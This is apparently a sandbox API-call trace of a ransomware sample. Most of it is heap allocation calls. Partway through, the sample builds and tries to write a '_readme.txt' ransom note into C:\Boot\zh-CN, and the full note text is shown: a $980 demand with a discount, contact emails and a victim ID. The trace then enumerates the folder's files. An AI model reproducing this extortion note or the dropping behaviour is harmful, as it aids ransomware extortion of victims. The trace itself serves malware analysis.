[0184.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.657] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0184.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.657] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.657] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.658] PathFindFileNameW (pszPath="") returned="" [0184.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.658] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.659] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0184.659] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0184.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.660] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.660] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0184.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.660] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0184.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.661] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.661] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.661] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.663] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*" (normalized: "c:\\boot\\zh-cn\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.664] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.664] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.664] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.664] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.666] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 